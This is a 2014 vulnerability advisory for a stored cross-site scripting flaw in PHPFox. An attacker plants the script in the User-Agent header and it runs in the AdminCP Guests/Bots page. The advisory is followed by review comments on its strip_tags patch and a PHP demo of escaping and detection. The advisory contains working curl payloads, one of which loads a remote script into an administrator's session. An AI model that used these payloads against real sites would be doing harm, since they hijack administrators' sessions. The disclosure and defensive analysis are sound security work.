
PHPFox Cross Site Scripting

Posted on 19 November 2014

CNA primary: MITRE Corporation (cve-assign [NOSPAM] mitre [NOSPAM] org)
Software Vendor: http://moxi9.com/phpfox
Product: PhpFox
Version: ALL
Research: Wesley Henrique Leite (wesleyhenrique [NOSPAM] gmail [NOSPAM] com)

[+] INFORMATION

Vendor Notified : 2014-10-22
Vendor Homepage : http://moxi9.com/phpfox
Response Vendor : fixed 2014-10-23 (to v4 Beta)

[+] DESCRIPTION

The system stores every URL accessed in a database table; the relevant information lives in the same table, 'phpfox_log_session':

[phpfox]> desc phpfox_log_session;
+---------------+----------------------+------+-----+---------+-------+
| Field         | Type                 | Null | Key | Default | Extra |
+---------------+----------------------+------+-----+---------+-------+
| session_hash  | char(32)             | NO   | MUL | NULL    |       |
| id_hash       | char(32)             | NO   |     | NULL    |       |
| captcha_hash  | char(32)             | YES  | MUL | NULL    |       |
| user_id       | int(10) unsigned     | NO   | MUL | NULL    |       |
| last_activity | int(10) unsigned     | NO   | MUL | NULL    |       |
| location      | varchar(255)         | YES  |     | NULL    |       |
| is_forum      | tinyint(1)           | NO   |     | NULL    |       |
| forum_id      | smallint(4) unsigned | NO   |     | NULL    |       |
| im_status     | tinyint(1)           | NO   |     | 0       |       |
| im_hide       | tinyint(1)           | NO   |     | 0       |       |
| ip_address    | varchar(15)          | NO   |     | NULL    |       |
| user_agent    | varchar(100)         | NO   |     | NULL    |       |
+---------------+----------------------+------+-----+---------+-------+

The column that can be manipulated is:

-> user_agent (100)

All accesses stored by the system, such as bots and users wandering around the web site, can be seen in:

AdminCP TOOLS > Online > Guests/Bots

Output: | IP ADDRESS | User-Agent | ...

Knowing this, the following command was created to inject a script into the AdminCP through the User-Agent header:

$ curl -A "<script src='http://www.example.com/script.js'></script>" http://www.meusite.com.br/

OR

$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/

When any user with administrative access opens 'AdminCP' TOOLS > Online > Guests/Bots, we have the script running in the administrative area.

[+] My Solution (line 1.8)

1.1  --- a/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 10:00:11 2014 -0200
1.2  +++ b/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 12:28:39 2014 -0200
1.3  @@ -25,7 +25,7 @@
1.4   {foreach from=$aGuests key=iKey item=aGuest}
1.5   <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}">
1.6   <td><a href="{url link='admincp.core.ip' search=$aGuest.ip_address_search}" title="{phrase var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td>
1.7  -<td>{$aGuest.user_agent}</td>
1.8  +<td>{$aGuest.user_agent|strip_tags}</td>
1.9   <td class="t_center">
1.10  <div class="js_item_is_active"{if !$aGuest.ban_id} style="display:none;"{/if}>
1.11  <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0" class="js_item_active_link" title="{phrase var='admincp.unban'}">{img theme='misc/bullet_green.png' alt=''}</a>
1.12 @@ -43,4 +43,4 @@
1.13  <div class="extra_info">
1.14  {phrase var='admincp.no_guests_online'}
1.15  </div>
1.16 -{/if}
1.17 \ No newline at end of file
1.18 +{/if}
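Review bot: line 1.8 replaces raw output with strip_tags, which removes markup rather than encoding it: the administrator no longer sees the value the client actually sent, a User-Agent containing a stray '<' is truncated, and the filter has to be remembered at every other place the column is printed. For a text-node context the conventional fix is to HTML-entity-encode the value at output (htmlspecialchars with ENT_QUOTES, or the template engine's escape modifier), which keeps the stored string intact and makes it inert; it is also worth checking whether the other free-text columns of phpfox_log_session shown in the description (location, for instance) are rendered anywhere with the same raw output.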
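Review bot: the second hunk (@@ -43,4 +43,4 @@) changes nothing except the missing newline at end of file; it is harmless but unrelated to the XSS fix, so it is better kept out of the security patch or called out in the description.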
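As an added example (not phpFox code and not part of the advisory), the PHP below renders constructed phpfox_log_session rows the way the template on line 1.7 did, then with the advisory's strip_tags fix, then with HTML entity encoding, and adds a check that flags stored User-Agent values carrying markup so the log table itself can be audited; the row data and function names are assumptions.

```php
<?php
// Constructed sample rows mirroring the ip_address/user_agent columns of phpfox_log_session.
// The second row is the advisory's payload; the third shows how strip_tags mangles a stray '<'.
$guests = [
    ['ip_address' => '192.0.2.10', 'user_agent' => 'Mozilla/5.0 (X11; Linux x86_64) Firefox/33.0'],
    ['ip_address' => '192.0.2.11', 'user_agent' => "<script src='http://www.example.com/script.js'></script>"],
    ['ip_address' => '192.0.2.12', 'user_agent' => 'curl/7.35 <unclosed'],
];

// Vulnerable rendering: the template echoed {$aGuest.user_agent} raw (line 1.7 of the patch),
// so whatever the client sent in the User-Agent header becomes part of the admin page.
function render_raw(string $ua): string {
    return '<td>' . $ua . '</td>';
}

// Advisory's fix (line 1.8): strip_tags removes anything that looks like markup. The admin
// never sees the real value, and an unterminated '<' drops the rest of the string.
function render_strip_tags(string $ua): string {
    return '<td>' . strip_tags($ua) . '</td>';
}

// Encoding fix: the browser displays the User-Agent exactly as stored, but it can only ever be text.
function render_escaped(string $ua): string {
    return '<td>' . htmlspecialchars($ua, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// Detection: a User-Agent that starts a tag, comment or processing instruction is not a browser
// string; flagging such rows lets an operator find injection attempts already sitting in the table.
function suspicious_user_agent(string $ua): bool {
    return (bool) preg_match('/<[a-z!\/?]/i', $ua);
}

foreach ($guests as $g) {
    printf("%-12s raw:        %s\n", $g['ip_address'], render_raw($g['user_agent']));
    printf("%-12s strip_tags: %s\n", '', render_strip_tags($g['user_agent']));
    printf("%-12s escaped:    %s\n", '', render_escaped($g['user_agent']));
    printf("%-12s suspicious: %s\n\n", '', suspicious_user_agent($g['user_agent']) ? 'yes' : 'no');
}
```

The escaped output for the payload row is `&lt;script src=&#039;http://www.example.com/script.js&#039;&gt;&lt;/script&gt;`, which the browser shows verbatim inside the cell.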
